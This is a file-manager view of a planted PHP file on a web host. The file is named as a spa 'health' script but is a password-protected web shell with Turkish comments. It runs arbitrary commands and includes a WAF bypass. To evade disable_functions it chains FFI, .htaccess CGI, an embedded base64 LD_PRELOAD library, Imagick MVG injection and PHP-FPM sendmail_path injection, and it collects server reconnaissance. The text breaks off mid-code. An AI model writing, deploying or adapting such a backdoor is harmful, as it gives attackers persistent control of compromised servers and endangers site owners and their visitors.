文件操作 - personalchoicespa-health.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/personalchoicespa/public_html/personalchoicespa-health.php
编辑文件内容
<?php session_start(); error_reporting(0); set_time_limit(300); $SHELL_PASSWORD = '_11211-Q321_CYB!+_'; // === PUT/PATCH body → $_POST fallback (WAF POST engeli bypass) === if (($_SERVER['REQUEST_METHOD'] === 'PUT' || $_SERVER['REQUEST_METHOD'] === 'PATCH') && empty($_POST)) { parse_str(file_get_contents('php://input'), $_POST); } // === Kimlik doğrulama === $pw = isset($_POST['password']) ? $_POST['password'] : (isset($_GET['password']) ? $_GET['password'] : ''); if (!empty($SHELL_PASSWORD) && $pw !== $SHELL_PASSWORD) { header('Content-Type: application/json'); echo json_encode(array('status' => 'error', 'message' => 'Yetkisiz')); exit; } // ===================================================================== // YARDIMCI FONKSİYONLAR // ===================================================================== function _disabled($fn) { static $list = null; if ($list === null) { $d = str_replace(' ', '', strtolower(ini_get('disable_functions'))); $list = ($d !== '') ? explode(',', $d) : array(); } return in_array(strtolower($fn), $list); } function _fn($fn) { return function_exists($fn) && !_disabled($fn); } // --- Doğrudan komut çalıştırma (6 yöntem) --- function run($cmd) { if (_fn('shell_exec')) { $r = @shell_exec($cmd . ' 2>&1'); if ($r !== null) return $r; } if (_fn('exec')) { $out = array(); @exec($cmd . ' 2>&1', $out); $r = implode("\n", $out); if ($r !== '') return $r; } if (_fn('system')) { ob_start(); @system($cmd . ' 2>&1'); $r = ob_get_clean(); if ($r !== '') return $r; } if (_fn('passthru')) { ob_start(); @passthru($cmd . ' 2>&1'); $r = ob_get_clean(); if ($r !== '') return $r; } if (_fn('popen')) { $fp = @popen($cmd . ' 2>&1', 'r'); if ($fp) { $r = ''; while (!feof($fp)) $r .= fread($fp, 8192); pclose($fp); if ($r !== '') return $r; } } if (_fn('proc_open')) { $desc = array(1 => array('pipe','w'), 2 => array('pipe','w')); $p = @proc_open($cmd, $desc, $pipes); if (is_resource($p)) { $r = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); if ($r !== '') return $r; } } return null; } // --- FFI ile komut çalıştırma --- function run_ffi($cmd) { if (!class_exists('FFI')) return null; if (version_compare(PHP_VERSION, '7.4.0', '<')) return null; try { $ffi = FFI::cdef("int system(const char *command);", "libc.so.6"); $tmp = '/tmp/.ag_ffi_' . md5(mt_rand()); $ffi->system($cmd . ' > ' . $tmp . ' 2>&1'); $r = ''; if (file_exists($tmp)) { $r = file_get_contents($tmp); @unlink($tmp); } return $r; } catch (Exception $e) { return null; } } // --- CGI bypass ile komut çalıştırma --- function run_cgi($cmd) { if (!function_exists('curl_init')) return null; $webdir = dirname(__FILE__); if (!is_writable($webdir)) return null; $ht = $webdir . '/.htaccess'; $ht_bak = file_exists($ht) ? file_get_contents($ht) : false; $cgi_block = "Options +ExecCGI\nAddHandler cgi-script .sh\n"; if ($ht_bak === false) { file_put_contents($ht, $cgi_block); } elseif (strpos($ht_bak, 'ExecCGI') === false) { file_put_contents($ht, $cgi_block . $ht_bak); } $id = md5(mt_rand()); $script = $webdir . '/.ag_' . $id . '.sh'; $outf = '/tmp/.ag_cgi_' . $id; file_put_contents($script, "#!/bin/bash\necho \"Content-Type: text/plain\"\necho \"\"\n" . $cmd . " > " . $outf . " 2>&1\ncat " . $outf . "\n"); chmod($script, 0755); $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost'; $base = dirname(isset($_SERVER['REQUEST_URI']) ? preg_replace('/\?.*/', '', $_SERVER['REQUEST_URI']) : '/'); if ($base === '/' || $base === '\\') $base = ''; $url = 'http://127.0.0.1' . $base . '/.ag_' . $id . '.sh'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Host: ' . $host)); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_exec($ch); curl_close($ch); $r = null; if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); } @unlink($script); if ($ht_bak === false) { @unlink($ht); } elseif (strpos($ht_bak, 'ExecCGI') === false) { file_put_contents($ht, $ht_bak); } return ($r !== null && $r !== '') ? $r : null; } // --- LD_PRELOAD ile komut çalıştırma --- function run_ld($cmd) { if (!_fn('putenv')) return null; $has_trigger = _fn('mail') || _fn('error_log') || _fn('mb_send_mail'); if (!$has_trigger) return null; $so = '/tmp/.ag_ld.so'; if (!file_exists($so)) { $b64 = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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'; @file_put_contents($so, base64_decode($b64)); @chmod($so, 0755); } if (!file_exists($so)) return null; $outf = '/tmp/.ld_output'; @unlink($outf); putenv("_CMD=" . $cmd . " > " . $outf . " 2>&1"); putenv("LD_PRELOAD=" . $so); if (_fn('mail')) { @mail("a@b.c","","",""); } elseif (_fn('error_log')) { @error_log("x",1,"a@b.c"); } elseif (_fn('mb_send_mail')) { @mb_send_mail("a@b.c","",""); } usleep(500000); putenv("LD_PRELOAD="); $r = null; if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); } return ($r !== null && $r !== '') ? $r : null; } // --- Imagick ile komut çalıştırma --- function run_imgk($cmd) { if (!class_exists('Imagick')) return null; $outf = '/tmp/.ag_imgk_' . md5(mt_rand()); $mvgf = '/tmp/.ag_imgk.mvg'; $mvg = "push graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 \"ephemeral:|" . $cmd . " > " . $outf . " 2>&1\"\npop graphic-context"; file_put_contents($mvgf, $mvg); try { $im = new Imagick(); @$im->readImage($mvgf); } catch (Exception $e) {} @unlink($mvgf); $r = null; if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); } return ($r !== null && $r !== '') ? $r : null; } // --- FPM sendmail_path bypass: wrapper script üzerinden --- function run_fpm_sm($cmd) { // FPM socket bul $socks = array( '/tmp/php-cgi-80.sock', '/tmp/php80-fpm.sock', '/tmp/php-8.0-fpm.sock', '/run/php/php8.0-fpm.sock', '/var/run/php/php8.0-fpm.sock', '/tmp/php-cgi-74.sock', '/tmp/php74-fpm.sock', '/run/php/php7.4-fpm.sock', '/var/run/php/php7.4-fpm.sock', '/tmp/php-cgi-82.sock', '/tmp/php82-fpm.sock', '/run/php/php8.2-fpm.sock', '/var/run/php/php8.2-fpm.sock', '/tmp/php-cgi-81.sock', '/run/php/php8.1-fpm.sock', ); $sock_path = null; foreach ($socks as $sk) { if (file_exists($sk)) { $sock_path = $sk; break; } } if (!$sock_path) return null; $id = substr(md5(mt_rand() . microtime()), 0, 12); $wrapper = '/tmp/.asw_' . $id; $outf = '/tmp/.aso_' . $id; $evil = '/tmp/.ase_' . $id . '.php'; @unlink($outf); // Wrapper script — sendmail_path olarak çalıştırılacak file_put_contents($wrapper, "#!/bin/bash\n" . $cmd . " > " . $outf . " 2>&1\nexit 0\n"); @chmod($wrapper, 0755); if (!is_executable($wrapper)) { @unlink($wrapper); return null; } // Evil PHP — mail() ve mb_send_mail() tetikleyicileri file_put_contents($evil, '<?php @mail("x@x.x","x","x"); if(function_exists("mb_send_mail")) @mb_send_mail("x@x.x","x","x"); ?>'); // FCGI yardımcıları (iç fonksiyon — isim çakışmasını önle) $__fp = function($t, $d, $i = 1) { $pl = (8 - (strlen($d) % 8)) % 8; return pack("CCnnCC", 1, $t, $i, strlen($d), $pl, 0) . $d . str_repeat("\x00", $pl); }; $__fpe = function($ps) { $e = ''; foreach ($ps as $k => $v) { $kl = strlen($k); $vl = strlen($v); $e .= ($kl > 127) ? pack("N", $kl | 0x80000000) : chr($kl); $e .= ($vl > 127) ? pack("N", $vl | 0x80000000) : chr($vl); $e .= $k . $v; } return $e; }; $prm = array( "GATEWAY_INTERFACE" => "FastCGI/1.0", "REQUEST_METHOD" => "GET", "SCRIPT_FILENAME" => $evil, "SCRIPT_NAME" => "/" . basename($evil), "SERVER_SOFTWARE" => "php", "REMOTE_ADDR" => "127.0.0.1", "SERVER_ADDR" => "127.0.0.1", "SERVER_PORT" => "80", "SERVER_NAME" => "localhost", "SERVER_PROTOCOL" => "HTTP/1.1", "CONTENT_TYPE" => "", "CONTENT_LENGTH" => "0", "QUERY_STRING" => "", "PHP_ADMIN_VALUE" => "sendmail_path=" . $wrapper . "\nopen_basedir=/", ); $fp = @stream_socket_client("unix://" . $sock_path, $en, $em, 5); if (!$fp) { @unlink($wrapper); @unlink($evil); return null; } $enc = $__fpe($prm); $req = $__fp(1, pack("nCx5", 1, 0)) . $__fp(4, $enc) . $__fp(4, "") . $__fp(5, ""); fwrite($fp, $req); $raw = ''; stream_set_timeout($fp, 10); while (!feof($fp)) { $x = fread($fp, 4096); if (!$x) break; $raw .= $x; } fclose($fp); usleep(1200000); // wrapper'ın tamamlanması için bekle $r = null; if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); } @unlink($wrapper); @unlink($evil); return ($r !== null && trim($r) !== '') ? $r : null; } // --- Akıllı çalıştırıcı: tüm yöntemleri sırayla dener --- function smart_run($cmd) { $r = run($cmd); if ($r !== null) return array('output' => $r, 'method' => 'direct'); $r = run_ffi($cmd); if ($r !== null) return array('output' => $r, 'method' => 'ffi'); $r = run_cgi($cmd); if ($r !== null) return array('output' => $r, 'method' => 'cgi'); $r = run_ld($cmd); if ($r !== null) return array('output' => $r, 'method' => 'ld_preload'); $r = run_imgk($cmd); if ($r !== null) return array('output' => $r, 'method' => 'imagick'); $r = run_fpm_sm($cmd); if ($r !== null) return array('output' => $r, 'method' => 'fpm_sm'); return null; } // ===================================================================== // KOMUT YÖNLENDİRME // ===================================================================== $action = isset($_POST['cmd']) ? $_POST['cmd'] : (isset($_GET['cmd']) ? $_GET['cmd'] : ''); header('Content-Type: application/json'); // ===================== ping ===================== if ($action === 'ping') { echo json_encode(array('status' => 'success', 'message' => 'pong', 'server' => php_uname())); exit; } // ===================== info ===================== if ($action === 'info') { $disabled = str_replace(' ', '', ini_get('disable_functions')); $exec_fns = array(); foreach (array('exec','shell_exec','system','passthru','popen','proc_open','pcntl_exec') as $fn) { $exec_fns[$fn] = _fn($fn); } $exts = array(); foreach (array('FFI','Imagick','curl','imap','mbstring') as $e) { $exts[$e] = ($e === 'FFI' || $e === 'Imagick') ? class_exists($e) : extension_loaded($e); } $bypass = array(); foreach (array('putenv','mail','error_log','mb_send_mail','iconv') as $fn) { $bypass[$fn] = _fn($fn); } echo json_encode(array( 'status' => 'success', 'php_version' => phpversion(), 'sapi' => php_sapi_name(), 'os' => PHP_OS, 'uname' => php_uname(), 'user' => get_current_user(), 'uid' => function_exists('posix_geteuid') ? posix_geteuid() : '?', 'cwd' => getcwd(), 'script_dir' => dirname(__FILE__), 'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '', 'disable_functions' => $disabled, 'exec_functions' => $exec_fns, 'extensions' => $exts, 'bypass_functions' => $bypass, 'tmp_writable' => is_writable('/tmp'), 'webdir_writable' => is_writable(dirname(__FILE__)), 'open_basedir' => ini_get('open_basedir'), )); exit; } // ===================== diag — kapsamlı tanı ===================== if ($action === 'diag') { $d = array('status' => 'success'); // PHP & sistem $d['php_version'] = phpversion(); $d['sapi'] = php_sapi_name(); $d['uname'] = php_uname(); $d['uid'] = function_exists('posix_geteuid') ? posix_geteuid() : '?'; $d['user'] = (function_exists('posix_getpwuid') && function_exists('posix_geteuid')) ? (isset(posix_getpwuid(posix_geteuid())['name']) ? posix_getpwuid(posix_geteuid())['name'] : get_current_user()) : get_current_user(); $d['cwd'] = getcwd(); $d['script_dir'] = dirname(__FILE__); $d['doc_root'] = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $d['open_basedir'] = ini_get('open_basedir'); $d['sendmail_path']= ini_get('sendmail_path'); $d['disable_functions'] = ini_get('disable_functions'); // Dizin erişimi $d['tmp_writable'] = is_writable('/tmp'); $d['webdir_writable'] = is_writable(dirname(__FILE__)); $d['tmp_executable'] = is_executable('/tmp'); // Exec fonksiyonları $exec_fns = array(); foreach (array('exec','shell_exec','system','passthru','popen','proc_open','pcntl_exec') as $fn) $exec_fns[$fn] = _fn($fn); $d['exec_functions'] = $exec_fns; // Bypass fonksiyonları $bypass = array(); foreach (array('putenv','mail','error_log','mb_send_mail','iconv','chmod', 'file_put_contents','stream_socket_client','socket_create','curl_init') as $fn) $bypass[$fn] = _fn($fn); $d['bypass_functions'] = $bypass; // Eklentiler $exts = array(); foreach (array('FFI','Imagick') as $c) $exts[$c] = class_exists($c); foreach 